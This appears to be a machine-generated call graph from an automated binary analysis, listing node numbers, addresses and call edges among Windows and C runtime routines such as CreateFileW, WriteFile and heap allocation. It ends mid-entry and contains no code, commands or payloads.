e50e2c 52413->52414 52539 e51280 20 API calls 52415->52539 52417 e50fd0 52418 e51063 52417->52418 52424 e50fd8 52417->52424 52542 e50580 28 API calls 2 library calls 52418->52542 52420 e5106b 52421 e8f18a Concurrency::cancel_current_task RaiseException 52420->52421 52422 e51079 52421->52422 52423 e462b0 _MREFOpen@16 28 API calls 52422->52423 52425 e51086 52423->52425 52540 e51280 20 API calls 52424->52540 52543 e34b40 52425->52543 52428 e51001 52428->52422 52432 e5100b 52428->52432 52430 e8f18a Concurrency::cancel_current_task RaiseException 52431 e510a7 52430->52431 52433 e462b0 _MREFOpen@16 28 API calls 52431->52433 52432->52431 52434 e51019 52432->52434 52435 e510b4 52433->52435 52541 e445e0 30 API calls _MREFOpen@16 52434->52541 52437 e34a50 78 API calls 52435->52437 52439 e510c7 52437->52439 52438 e51025 52441 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52438->52441 52440 e8f18a Concurrency::cancel_current_task RaiseException 52439->52440 52443 e510d5 52440->52443 52442 e5105c 52441->52442 52546 e51280 20 API calls 52443->52546 52445 e5115a 52446 e51162 52445->52446 52447 e5125b 52445->52447 52547 e51280 20 API calls 52446->52547 52550 e50580 28 API calls 2 library calls 52447->52550 52450 e51169 52452 e44580 24 API calls 52450->52452 52451 e51263 52453 e8f18a Concurrency::cancel_current_task RaiseException 52451->52453 52454 e51178 52452->52454 52455 e51271 52453->52455 52456 e55860 80 API calls 52454->52456 52457 e51195 52456->52457 52458 e511cb 52457->52458 52459 e7af40 20 API calls 52457->52459 52548 e51280 20 API calls 52458->52548 52459->52458 52461 e511fd 52549 e5a810 80 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 52461->52549 52462 e511e1 52462->52461 52465 e56090 80 API calls 52462->52465 52464 e5120d 52466 e51233 52464->52466 52467 e7af40 20 API calls 52464->52467 52465->52461 52468 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52466->52468 52467->52466 52469 e51255 52468->52469 52472 e5032a 52471->52472 52482 e50361 error_info_injector 52471->52482 52473 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52472->52473 52474 e5035d 52473->52474 52474->52343 52475 e50449 52552 e31870 28 API calls _MREFOpen@16 52475->52552 52478 e5044e 52553 e9c3be 26 API calls 2 library calls 52478->52553 52482->52472 52482->52475 52482->52478 52551 e4cc60 28 API calls 4 library calls 52482->52551 52554 e4ca80 52486->52554 52488 e4a6b4 52488->52352 52490 e47f11 52489->52490 52494 e556e0 80 API calls 52490->52494 52491 e47f1c 52492 e7af40 20 API calls 52491->52492 52493 e47f5c 52491->52493 52492->52493 52493->52372 52494->52491 52496 e558ae 52495->52496 52497 e558a9 52495->52497 52499 e47fd0 80 API calls 52496->52499 52574 e66820 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52497->52574 52500 e558d6 52499->52500 52501 e55904 52500->52501 52502 e558e6 52500->52502 52504 e55912 52501->52504 52505 e7af50 _MREFOpen@16 24 API calls 52501->52505 52575 e55ce0 80 API calls 52502->52575 52507 e55938 52504->52507 52509 e55994 52504->52509 52505->52504 52506 e558f3 52576 e59c90 80 API calls 3 library calls 52506->52576 52577 e55ce0 80 API calls 52507->52577 52579 e9c3be 26 API calls 2 library calls 52509->52579 52510 e55902 52514 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52510->52514 52516 e50d6c 52514->52516 52515 e5594d 52578 e59c90 80 API calls 3 library calls 52515->52578 52518 e6b590 52516->52518 52519 e462b0 _MREFOpen@16 28 API calls 52518->52519 52520 e6b5c5 52519->52520 52521 e34b40 78 API calls 52520->52521 52522 e6b5d8 52521->52522 52523 e8f18a Concurrency::cancel_current_task RaiseException 52522->52523 52524 e6b5e6 52523->52524 52580 e53550 52524->52580 52526 e6b606 52526->52397 52527->52338 52529 e560a0 52528->52529 52532 e56105 _Yarn 52528->52532 52535 e560e4 __cftof 52529->52535 52592 e5cad0 80 API calls 52529->52592 52532->52355 52533 e5612d 52594 e9c3ae 26 API calls __cftof 52533->52594 52535->52532 52593 e9ca3d 20 API calls _free 52535->52593 52536->52360 52537->52367 52538->52402 52539->52417 52540->52428 52541->52438 52542->52420 52544 e462f0 _MREFOpen@16 78 API calls 52543->52544 52545 e34b90 52544->52545 52545->52430 52546->52445 52547->52450 52548->52462 52549->52464 52550->52451 52551->52482 52555 e4cac3 52554->52555 52556 e4cc50 52555->52556 52557 e4cb90 52555->52557 52560 e4cac8 _Yarn 52555->52560 52571 e31870 28 API calls _MREFOpen@16 52556->52571 52561 e4cbc5 52557->52561 52562 e4cbeb 52557->52562 52559 e4cc55 52572 e317d0 28 API calls 2 library calls 52559->52572 52560->52488 52561->52559 52564 e4cbd0 52561->52564 52568 e8d73a std::_Facet_Register 28 API calls 52562->52568 52570 e4cbdd _Yarn 52562->52570 52567 e8d73a std::_Facet_Register 28 API calls 52564->52567 52565 e4cbd6 52565->52570 52573 e9c3be 26 API calls 2 library calls 52565->52573 52567->52565 52568->52570 52570->52488 52572->52565 52574->52496 52575->52506 52576->52510 52577->52515 52578->52510 52581 e535a2 52580->52581 52589 e5358e 52580->52589 52590 e8d658 6 API calls 52581->52590 52583 e535ac 52584 e51c70 78 API calls 52583->52584 52583->52589 52585 e535cb 52584->52585 52586 e8d9a6 29 API calls 52585->52586 52587 e535df 52586->52587 52591 e8d60e EnterCriticalSection LeaveCriticalSection WakeAllConditionVariable SetEvent ResetEvent 52587->52591 52589->52526 52590->52583 52591->52589 52592->52535 52593->52533 52594->52532 52595 e6bdc0 52596 e53550 89 API calls 52595->52596 52597 e6be28 52596->52597 52598 e556e0 80 API calls 52597->52598 52599 e6be64 52598->52599 52648 e55620 52599->52648 52602 e559a0 80 API calls 52603 e6be86 52602->52603 52604 e559a0 80 API calls 52603->52604 52605 e6be95 52604->52605 52606 e559a0 80 API calls 52605->52606 52611 e6bea1 52606->52611 52610 e7af40 20 API calls 52610->52611 52611->52610 52612 e56090 80 API calls 52611->52612 52613 e6bf78 52611->52613 52654 e5bda0 52611->52654 52666 e5d390 80 API calls 3 library calls 52611->52666 52667 e5b610 80 API calls 52611->52667 52612->52611 52668 e6f7a0 52613->52668 52617 e6bfa8 52618 e56090 80 API calls 52617->52618 52619 e6bfb1 52618->52619 52674 e817e0 80 API calls 52619->52674 52621 e6bfdb 52675 e5c760 80 API calls 52621->52675 52623 e6bff4 52624 e56090 80 API calls 52623->52624 52625 e6bffc 52624->52625 52626 e6f7a0 80 API calls 52625->52626 52627 e6c00d 52626->52627 52628 e7af40 20 API calls 52627->52628 52629 e6c043 52627->52629 52628->52629 52630 e6c10d 52629->52630 52631 e6c059 52629->52631 52632 e462b0 _MREFOpen@16 28 API calls 52630->52632 52633 e7af40 20 API calls 52631->52633 52635 e6c07c 52631->52635 52634 e6c11a 52632->52634 52633->52635 52677 e349a0 78 API calls _MREFOpen@16 52634->52677 52638 e7af40 20 API calls 52635->52638 52640 e6c0a9 52635->52640 52637 e6c12c 52639 e8f18a Concurrency::cancel_current_task RaiseException 52637->52639 52638->52640 52644 e6c13a 52639->52644 52641 e7af40 20 API calls 52640->52641 52642 e6c0d6 52640->52642 52641->52642 52676 e55f00 20 API calls 52642->52676 52645 e6c0eb 52646 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52645->52646 52647 e6c106 52646->52647 52649 e55638 52648->52649 52650 e55633 52648->52650 52652 e47fd0 80 API calls 52649->52652 52678 e66820 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52650->52678 52653 e556ad 52652->52653 52653->52602 52655 e55620 80 API calls 52654->52655 52656 e5bdf0 52655->52656 52657 e5be07 52656->52657 52658 e5be16 52656->52658 52659 e5be2c 52657->52659 52660 e5be0f 52657->52660 52658->52659 52661 e5be1b 52658->52661 52681 e5d140 26 API calls 3 library calls 52659->52681 52679 e5cbd0 80 API calls 3 library calls 52660->52679 52680 e5cbd0 80 API calls 3 library calls 52661->52680 52665 e5be14 52665->52611 52666->52611 52667->52611 52669 e559a0 80 API calls 52668->52669 52670 e6f7df 52669->52670 52682 e66a90 52670->52682 52671 e6bf92 52673 e5c760 80 API calls 52671->52673 52673->52617 52674->52621 52675->52623 52676->52645 52677->52637 52678->52649 52679->52665 52680->52665 52681->52665 52683 e66bc6 52682->52683 52684 e66ac8 52682->52684 52685 e6fe00 80 API calls 52683->52685 52684->52683 52686 e66ad4 52684->52686 52687 e66bd7 52685->52687 52702 e55a00 52686->52702 52687->52671 52689 e66ae0 52727 e59970 80 API calls 52689->52727 52691 e66af9 52728 e6fe00 52691->52728 52694 e7af40 20 API calls 52701 e66b3f 52694->52701 52695 e66ba7 52733 e55fe0 20 API calls 52695->52733 52698 e66bb2 52698->52671 52699 e56090 80 API calls 52699->52701 52700 e7af40 20 API calls 52700->52701 52701->52695 52701->52699 52701->52700 52732 e59a90 80 API calls 3 library calls 52701->52732 52703 e556e0 80 API calls 52702->52703 52704 e55a4f 52703->52704 52705 e55620 80 API calls 52704->52705 52706 e55a63 52705->52706 52707 e559a0 80 API calls 52706->52707 52708 e55a6f 52707->52708 52709 e55620 80 API calls 52708->52709 52710 e55a89 52709->52710 52711 e47fd0 80 API calls 52710->52711 52712 e55aa8 52711->52712 52713 e55aef 52712->52713 52714 e55abd 52712->52714 52715 e462b0 _MREFOpen@16 28 API calls 52713->52715 52719 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52714->52719 52716 e55afc 52715->52716 52717 e34a50 78 API calls 52716->52717 52718 e55b0c 52717->52718 52720 e8f18a Concurrency::cancel_current_task RaiseException 52718->52720 52721 e55ae9 52719->52721 52722 e55b1a 52720->52722 52721->52689 52734 e8ee1e 27 API calls 2 library calls 52722->52734 52724 e55b67 52725 e462f0 _MREFOpen@16 78 API calls 52724->52725 52726 e55b89 52725->52726 52726->52689 52727->52691 52729 e6fe15 52728->52729 52735 e6fe20 52729->52735 52731 e66b17 52731->52694 52731->52701 52732->52701 52733->52698 52734->52724 52736 e6fe73 52735->52736 52754 e6fe9e 52735->52754 52737 e6fe7f 52736->52737 52738 e705c8 52736->52738 52743 e6feb4 52737->52743 52744 e6fe8d 52737->52744 52831 e4c7d0 28 API calls _MREFOpen@16 52738->52831 52739 e556e0 80 API calls 52768 e7020a 52739->52768 52741 e705d2 52833 e4c7d0 28 API calls _MREFOpen@16 52741->52833 52742 e6ff39 52787 e708b0 52742->52787 52750 e8d73a std::_Facet_Register 28 API calls 52743->52750 52743->52754 52745 e705cd 52744->52745 52748 e6fe98 52744->52748 52832 e317d0 28 API calls 2 library calls 52745->52832 52752 e8d73a std::_Facet_Register 28 API calls 52748->52752 52750->52754 52751 e70574 52760 e705a9 error_info_injector 52751->52760 52834 e9c3be 26 API calls 2 library calls 52751->52834 52752->52754 52753 e704c2 52756 e7af40 20 API calls 52753->52756 52757 e704e5 52753->52757 52754->52741 52754->52742 52754->52751 52783 e701f5 52754->52783 52756->52757 52758 e7050e error_info_injector 52757->52758 52829 e6f000 20 API calls 52757->52829 52758->52751 52758->52760 52830 e709d0 26 API calls 2 library calls 52758->52830 52760->52731 52762 e56090 80 API calls 52772 e703f3 52762->52772 52763 e56090 80 API calls 52763->52768 52768->52753 52768->52763 52768->52772 52778 e568f0 80 API calls 52768->52778 52827 e569d0 80 API calls 52768->52827 52828 e5bfb0 28 API calls 3 library calls 52768->52828 52772->52753 52772->52762 52776 e7af40 20 API calls 52780 e6ff42 52776->52780 52778->52768 52780->52776 52780->52783 52785 e556e0 80 API calls 52780->52785 52794 e56a60 52780->52794 52798 e5c2c0 52780->52798 52809 e6eaa0 80 API calls 52780->52809 52810 e569d0 80 API calls 52780->52810 52811 e5bfb0 28 API calls 3 library calls 52780->52811 52812 e568f0 52780->52812 52826 e6ebf0 80 API calls Concurrency::cancel_current_task 52780->52826 52783->52739 52785->52780 52835 e70c00 52787->52835 52789 e708f0 52850 e70b10 52789->52850 52793 e70915 52793->52780 52795 e56a70 52794->52795 52865 e595c0 52795->52865 52797 e56b01 52797->52780 52871 e5d2f0 52798->52871 52802 e5c313 52803 e56090 80 API calls 52802->52803 52804 e5c323 52803->52804 52805 e7af40 20 API calls 52804->52805 52806 e5c348 52804->52806 52805->52806 52807 e7af40 20 API calls 52806->52807 52808 e5c378 52806->52808 52807->52808 52808->52780 52809->52780 52810->52780 52811->52780 52813 e595c0 80 API calls 52812->52813 52814 e56903 52813->52814 52815 e56923 52814->52815 52816 e5690c 52814->52816 52818 e56928 52815->52818 52819 e5693a 52815->52819 52817 e56914 52816->52817 52816->52818 52940 e5cbd0 80 API calls 3 library calls 52817->52940 52941 e5d140 26 API calls 3 library calls 52818->52941 52942 e5cbd0 80 API calls 3 library calls 52819->52942 52823 e56919 52823->52780 52824 e56930 52824->52780 52825 e56942 52825->52780 52826->52780 52827->52768 52828->52768 52829->52757 52830->52758 52832->52741 52836 e70c4c 52835->52836 52837 e70c0b 52835->52837 52861 e317d0 28 API calls 2 library calls 52836->52861 52839 e70c37 52837->52839 52840 e70c15 52837->52840 52841 e70c47 52839->52841 52844 e8d73a std::_Facet_Register 28 API calls 52839->52844 52840->52836 52843 e70c1c 52840->52843 52841->52789 52842 e70c22 52849 e70c2b 52842->52849 52862 e9c3be 26 API calls 2 library calls 52842->52862 52846 e8d73a std::_Facet_Register 28 API calls 52843->52846 52847 e70c41 52844->52847 52846->52842 52847->52789 52849->52789 52851 e70909 52850->52851 52852 e70b55 52850->52852 52854 e706a0 52851->52854 52852->52851 52853 e556e0 80 API calls 52852->52853 52853->52852 52855 e706aa 52854->52855 52858 e706e2 error_info_injector 52854->52858 52856 e706c0 52855->52856 52863 e6f000 20 API calls 52855->52863 52856->52858 52864 e9c3be 26 API calls 2 library calls 52856->52864 52858->52793 52861->52842 52863->52855 52866 e595d0 52865->52866 52870 e59611 __cftof 52865->52870 52867 e47fd0 80 API calls 52866->52867 52868 e595dd _Yarn 52867->52868 52869 e7af40 20 API calls 52868->52869 52868->52870 52869->52870 52870->52797 52872 e55620 80 API calls 52871->52872 52873 e5d33a 52872->52873 52874 e595c0 80 API calls 52873->52874 52875 e5c2fa 52874->52875 52876 e5bef0 52875->52876 52877 e559a0 80 API calls 52876->52877 52878 e5bf32 52877->52878 52879 e559a0 80 API calls 52878->52879 52880 e5bf48 52879->52880 52885 e5a2f0 52880->52885 52883 e7af40 20 API calls 52884 e5bf86 52883->52884 52884->52802 52900 e5cda0 52885->52900 52888 e5a3a6 52889 e556e0 80 API calls 52888->52889 52892 e5a3b1 52889->52892 52891 e5a39d 52891->52883 52891->52884 52926 e564b0 80 API calls 52892->52926 52894 e5a3cd 52895 e56090 80 API calls 52894->52895 52896 e5a3dc 52895->52896 52927 e35a80 52896->52927 52898 e5a3e4 52899 e35a80 20 API calls 52898->52899 52899->52891 52906 e5cdea 52900->52906 52901 e5cf2f 52939 e55500 28 API calls 2 library calls 52901->52939 52903 e5cf37 52905 e8f18a Concurrency::cancel_current_task RaiseException 52903->52905 52904 e5ce27 52907 e5ce4b 52904->52907 52908 e5ce2b 52904->52908 52910 e5cf45 52905->52910 52906->52901 52906->52904 52932 e59660 52907->52932 52909 e56090 80 API calls 52908->52909 52911 e5ce33 52909->52911 52912 e56090 80 API calls 52911->52912 52923 e5ce46 52912->52923 52914 e5ce6b 52917 e59660 80 API calls 52914->52917 52915 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52916 e5a32c 52915->52916 52916->52891 52925 e563d0 80 API calls 52916->52925 52918 e5ce8e 52917->52918 52919 e47fd0 80 API calls 52918->52919 52920 e5ceb2 52919->52920 52938 e59f20 26 API calls 3 library calls 52920->52938 52922 e5cedc 52922->52923 52924 e7af40 20 API calls 52922->52924 52923->52915 52924->52923 52925->52888 52926->52894 52928 e35ac5 52927->52928 52931 e35ade 52927->52931 52929 e7af40 20 API calls 52928->52929 52930 e35aca 52929->52930 52930->52898 52931->52898 52933 e59673 52932->52933 52937 e5969b __cftof 52932->52937 52934 e59687 52933->52934 52935 e7af40 20 API calls 52933->52935 52936 e47fd0 80 API calls 52934->52936 52935->52934 52936->52937 52937->52914 52938->52922 52939->52903 52940->52823 52941->52824 52942->52825 52943 e71800 52944 e7180e 52943->52944 52946 e527c0 80 API calls 52944->52946 52945 e71833 52946->52945 52947 ea8e4d 52952 ea8c20 52947->52952 52951 ea8e75 52957 ea8c40 UnDecorator::getSymbolName 52952->52957 52954 ea8e39 52971 e9c3ae 26 API calls __cftof 52954->52971 52956 ea8d91 52956->52951 52964 eb0944 52956->52964 52957->52957 52962 ea8d89 52957->52962 52967 eb020e 52 API calls 2 library calls 52957->52967 52959 ea8dd8 52959->52962 52968 eb020e 52 API calls 2 library calls 52959->52968 52961 ea8df6 52961->52962 52969 eb020e 52 API calls 2 library calls 52961->52969 52962->52956 52970 e9ca3d 20 API calls _free 52962->52970 52972 eb0332 52964->52972 52966 eb095f 52966->52951 52967->52959 52968->52961 52969->52962 52970->52954 52971->52956 52975 eb033e __FrameHandler3::FrameUnwindToState 52972->52975 52973 eb0345 52990 e9ca3d 20 API calls _free 52973->52990 52975->52973 52977 eb0370 52975->52977 52976 eb034a 52991 e9c3ae 26 API calls __cftof 52976->52991 52983 eb08f3 52977->52983 52982 eb0354 __wsopen_s 52982->52966 52993 ea5ee2 52983->52993 52986 eb0394 52992 eb03bd LeaveCriticalSection __wsopen_s 52986->52992 52989 ea4646 _free 20 API calls 52989->52986 52990->52976 52991->52982 52992->52982 52994 ea5eee 52993->52994 52995 ea5f05 52993->52995 53064 e9ca3d 20 API calls _free 52994->53064 52997 ea5f0d 52995->52997 52998 ea5f24 52995->52998 53066 e9ca3d 20 API calls _free 52997->53066 53068 ea4a6d 52998->53068 53001 ea5ef3 53065 e9c3ae 26 API calls __cftof 53001->53065 53002 ea5f12 53067 e9c3ae 26 API calls __cftof 53002->53067 53006 ea5f5a 53074 ea6049 53006->53074 53007 ea5f4a GetLastError 53073 e9ca07 20 API calls 2 library calls 53007->53073 53010 ea5efe 53010->52986 53017 eb0964 53010->53017 53012 ea5f8a 53014 ea4646 _free 20 API calls 53012->53014 53013 ea5f69 MultiByteToWideChar 53013->53012 53015 ea5f7e GetLastError 53013->53015 53014->53010 53081 e9ca07 20 API calls 2 library calls 53015->53081 53087 eb06c7 53017->53087 53020 eb09af 53105 eabeab 53020->53105 53021 eb0996 53119 e9ca2a 20 API calls _free 53021->53119 53024 eb09b4 53026 eb09bd 53024->53026 53027 eb09d4 53024->53027 53025 eb099b 53120 e9ca3d 20 API calls _free 53025->53120 53121 e9ca2a 20 API calls _free 53026->53121 53118 eb0632 CreateFileW 53027->53118 53031 eb09c2 53122 e9ca3d 20 API calls _free 53031->53122 53032 eb0931 53032->52989 53034 eb0a8a GetFileType 53035 eb0adc 53034->53035 53036 eb0a95 GetLastError 53034->53036 53127 eabdf4 21 API calls 3 library calls 53035->53127 53125 e9ca07 20 API calls 2 library calls 53036->53125 53037 eb0a5f GetLastError 53124 e9ca07 20 API calls 2 library calls 53037->53124 53039 eb0a0d 53039->53034 53039->53037 53123 eb0632 CreateFileW 53039->53123 53041 eb0aa3 CloseHandle 53041->53025 53043 eb0acc 53041->53043 53126 e9ca3d 20 API calls _free 53043->53126 53045 eb0a52 53045->53034 53045->53037 53047 eb0afd 53049 eb0b49 53047->53049 53128 eb0843 80 API calls 4 library calls 53047->53128 53048 eb0ad1 53048->53025 53053 eb0b76 53049->53053 53129 eb03e9 80 API calls 4 library calls 53049->53129 53052 eb0b6f 53052->53053 53054 eb0b87 53052->53054 53130 ea5ce9 53053->53130 53054->53032 53056 eb0c05 CloseHandle 53054->53056 53145 eb0632 CreateFileW 53056->53145 53058 eb0c30 53059 eb0c3a GetLastError 53058->53059 53060 eb0c66 53058->53060 53146 e9ca07 20 API calls 2 library calls 53059->53146 53060->53032 53062 eb0c46 53147 eabfb4 21 API calls 3 library calls 53062->53147 53064->53001 53065->53010 53066->53002 53067->53010 53082 ea4757 53068->53082 53070 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 53071 ea4aa3 MultiByteToWideChar 53070->53071 53071->53006 53071->53007 53073->53010 53075 ea6087 53074->53075 53076 ea6057 __Getctype 53074->53076 53086 e9ca3d 20 API calls _free 53075->53086 53076->53075 53078 ea6072 RtlAllocateHeap 53076->53078 53085 e9fba8 7 API calls 2 library calls 53076->53085 53078->53076 53079 ea5f62 53078->53079 53079->53012 53079->53013 53081->53012 53083 ea493d __FrameHandler3::FrameUnwindToState 5 API calls 53082->53083 53084 ea476d 53083->53084 53084->53070 53085->53076 53086->53079 53088 eb06e8 53087->53088 53094 eb0702 53087->53094 53088->53094 53155 e9ca3d 20 API calls _free 53088->53155 53091 eb073a 53095 eb0769 53091->53095 53157 e9ca3d 20 API calls _free 53091->53157 53092 eb06f7 53156 e9c3ae 26 API calls __cftof 53092->53156 53148 eb0657 53094->53148 53102 eb07bc 53095->53102 53159 ea180a 26 API calls 2 library calls 53095->53159 53098 eb07b7 53100 eb0836 53098->53100 53098->53102 53099 eb075e 53158 e9c3ae 26 API calls __cftof 53099->53158 53160 e9c3db 11 API calls __FrameHandler3::FrameUnwindToState 53100->53160 53102->53020 53102->53021 53104 eb0842 53106 eabeb7 __FrameHandler3::FrameUnwindToState 53105->53106 53163 e9f2ab EnterCriticalSection 53106->53163 53108 eabebe 53110 eabee3 53108->53110 53114 eabf48 EnterCriticalSection 53108->53114 53115 eabf05 53108->53115 53167 eabc8e 21 API calls 3 library calls 53110->53167 53111 eabf25 __wsopen_s 53111->53024 53113 eabee8 53113->53115 53168 eabdd1 EnterCriticalSection 53113->53168 53114->53115 53116 eabf55 LeaveCriticalSection 53114->53116 53164 eabfab 53115->53164 53116->53108 53118->53039 53119->53025 53120->53032 53121->53031 53122->53025 53123->53045 53124->53025 53125->53041 53126->53048 53127->53047 53128->53049 53129->53052 53131 eac045 __wsopen_s 26 API calls 53130->53131 53134 ea5cf9 53131->53134 53132 ea5cff 53170 eabfb4 21 API calls 3 library calls 53132->53170 53134->53132 53135 eac045 __wsopen_s 26 API calls 53134->53135 53144 ea5d31 53134->53144 53139 ea5d28 53135->53139 53136 eac045 __wsopen_s 26 API calls 53140 ea5d3d CloseHandle 53136->53140 53137 ea5d79 53137->53032 53138 ea5d57 53138->53137 53171 e9ca07 20 API calls 2 library calls 53138->53171 53143 eac045 __wsopen_s 26 API calls 53139->53143 53140->53132 53141 ea5d49 GetLastError 53140->53141 53141->53132 53143->53144 53144->53132 53144->53136 53145->53058 53146->53062 53147->53060 53150 eb066f 53148->53150 53149 eb068a 53149->53091 53150->53149 53161 e9ca3d 20 API calls _free 53150->53161 53152 eb06ae 53162 e9c3ae 26 API calls __cftof 53152->53162 53154 eb06b9 53154->53091 53155->53092 53156->53094 53157->53099 53158->53095 53159->53098 53160->53104 53161->53152 53162->53154 53163->53108 53169 e9f2f3 LeaveCriticalSection 53164->53169 53166 eabfb2 53166->53111 53167->53113 53168->53115 53169->53166 53170->53138 53171->53137 53172 e827f0 53173 e8283b 53172->53173 53174 e827fb 53172->53174 53187 e317d0 28 API calls 2 library calls 53173->53187 53176 e82804 53174->53176 53177 e82826 53174->53177 53176->53173 53179 e8280b 53176->53179 53180 e82836 53177->53180 53183 e8d73a std::_Facet_Register 28 API calls 53177->53183 53178 e82811 53185 e8281a 53178->53185 53188 e9c3be 26 API calls 2 library calls 53178->53188 53182 e8d73a std::_Facet_Register 28 API calls 53179->53182 53182->53178 53184 e82830 53183->53184 53187->53178 53189 ea3cb3 53190 ea3c8d __fread_nolock 26 API calls 53189->53190 53191 ea3cc1 53190->53191 53192 ea3cee 53191->53192 53193 ea3ccf 53191->53193 53194 ea3cfb 53192->53194 53200 ea3d08 _MREFOpen@16 53192->53200 53215 e9ca3d 20 API calls _free 53193->53215 53216 e9ca3d 20 API calls _free 53194->53216 53198 ea3cd4 53200->53198 53201 ea3d8b 53200->53201 53202 ea3d98 53200->53202 53217 eae7a2 53200->53217 53201->53202 53226 ea764a 53201->53226 53204 ea3dc4 53202->53204 53205 ea3c8d __fread_nolock 26 API calls 53204->53205 53206 ea3dd3 53205->53206 53207 ea3e75 53206->53207 53208 ea3de5 53206->53208 53209 ea58de __wsopen_s 71 API calls 53207->53209 53210 ea3e02 53208->53210 53212 ea3e26 53208->53212 53213 ea3e0f 53209->53213 53231 ea58de 53210->53231 53212->53213 53214 ea843a 30 API calls 53212->53214 53213->53198 53214->53213 53215->53198 53216->53198 53218 eae7af 53217->53218 53219 eae7bc 53217->53219 53350 e9ca3d 20 API calls _free 53218->53350 53221 eae7c8 53219->53221 53351 e9ca3d 20 API calls _free 53219->53351 53221->53201 53223 eae7b4 53223->53201 53224 eae7e9 53352 e9c3ae 26 API calls __cftof 53224->53352 53227 ea6049 __fread_nolock 21 API calls 53226->53227 53228 ea7665 53227->53228 53229 ea4646 _free 20 API calls 53228->53229 53230 ea766f 53229->53230 53230->53202 53232 ea58ea __FrameHandler3::FrameUnwindToState 53231->53232 53233 ea590a 53232->53233 53234 ea58f2 53232->53234 53235 ea59a5 53233->53235 53239 ea593c 53233->53239 53310 e9ca2a 20 API calls _free 53234->53310 53315 e9ca2a 20 API calls _free 53235->53315 53238 ea58f7 53311 e9ca3d 20 API calls _free 53238->53311 53256 eabdd1 EnterCriticalSection 53239->53256 53240 ea59aa 53316 e9ca3d 20 API calls _free 53240->53316 53242 ea58ff __wsopen_s 53242->53213 53245 ea5942 53247 ea595e 53245->53247 53248 ea5973 53245->53248 53246 ea59b2 53317 e9c3ae 26 API calls __cftof 53246->53317 53312 e9ca3d 20 API calls _free 53247->53312 53257 ea59c6 53248->53257 53252 ea5963 53313 e9ca2a 20 API calls _free 53252->53313 53255 ea596e 53314 ea599d LeaveCriticalSection __wsopen_s 53255->53314 53256->53245 53258 ea59f3 53257->53258 53294 ea59ec 53257->53294 53259 ea5a17 53258->53259 53260 ea59f7 53258->53260 53264 ea5a49 53259->53264 53267 ea5a66 53259->53267 53332 e9ca2a 20 API calls _free 53260->53332 53262 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 53265 ea5bd4 53262->53265 53263 ea59fc 53333 e9ca3d 20 API calls _free 53263->53333 53335 e9ca2a 20 API calls _free 53264->53335 53265->53255 53266 ea5a79 53318 ea556e 53266->53318 53267->53266 53338 ea8455 53267->53338 53271 ea5a04 53334 e9c3ae 26 API calls __cftof 53271->53334 53273 ea5a4e 53336 e9ca3d 20 API calls _free 53273->53336 53277 ea5ace 53280 ea5ae2 53277->53280 53281 ea5b27 WriteFile 53277->53281 53278 ea5a8f 53282 ea5ab8 53278->53282 53283 ea5a93 53278->53283 53279 ea5a56 53337 e9c3ae 26 API calls __cftof 53279->53337 53285 ea5aed 53280->53285 53286 ea5b17 53280->53286 53287 ea5b4b GetLastError 53281->53287 53289 ea5aae 53281->53289 53342 ea533d 51 API calls 3 library calls 53282->53342 53283->53289 53341 ea5501 6 API calls __wsopen_s 53283->53341 53290 ea5af2 53285->53290 53291 ea5b07 53285->53291 53325 ea55e4 53286->53325 53287->53289 53289->53294 53297 ea5b71 53289->53297 53298 ea5b95 53289->53298 53290->53289 53295 ea5af7 53290->53295 53344 ea57b1 8 API calls 2 library calls 53291->53344 53294->53262 53343 ea56c3 7 API calls 2 library calls 53295->53343 53301 ea5b78 53297->53301 53302 ea5b8c 53297->53302 53298->53294 53348 e9ca3d 20 API calls _free 53298->53348 53300 ea5b05 53300->53289 53345 e9ca3d 20 API calls _free 53301->53345 53347 e9ca07 20 API calls 2 library calls 53302->53347 53306 ea5bb1 53349 e9ca2a 20 API calls _free 53306->53349 53307 ea5b7d 53346 e9ca2a 20 API calls _free 53307->53346 53310->53238 53311->53242 53312->53252 53313->53255 53314->53242 53315->53240 53316->53246 53317->53242 53319 eae7a2 __fread_nolock 26 API calls 53318->53319 53320 ea557e 53319->53320 53321 ea43ff __Getctype 45 API calls 53320->53321 53322 ea5583 53320->53322 53323 ea55a6 53321->53323 53322->53277 53322->53278 53323->53322 53324 ea55c4 GetConsoleMode 53323->53324 53324->53322 53329 ea55f3 __wsopen_s 53325->53329 53326 ea56a6 53327 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 53326->53327 53331 ea56bf 53327->53331 53328 ea5665 WriteFile 53328->53329 53330 ea56a8 GetLastError 53328->53330 53329->53326 53329->53328 53330->53326 53331->53289 53332->53263 53333->53271 53334->53294 53335->53273 53336->53279 53337->53294 53339 ea83bc __fread_nolock 28 API calls 53338->53339 53340 ea846b 53339->53340 53340->53266 53341->53289 53342->53289 53343->53300 53344->53300 53345->53307 53346->53294 53347->53294 53348->53306 53349->53294 53350->53223 53351->53224 53352->53223 53353 ea6ea3 53354 ea6ec8 53353->53354 53355 ea6eb0 53353->53355 53359 ea6f23 53354->53359 53360 ea764a 21 API calls 53354->53360 53367 ea6ec0 53354->53367 53403 e9ca3d 20 API calls _free 53355->53403 53357 ea6eb5 53404 e9c3ae 26 API calls __cftof 53357->53404 53361 ea3c8d 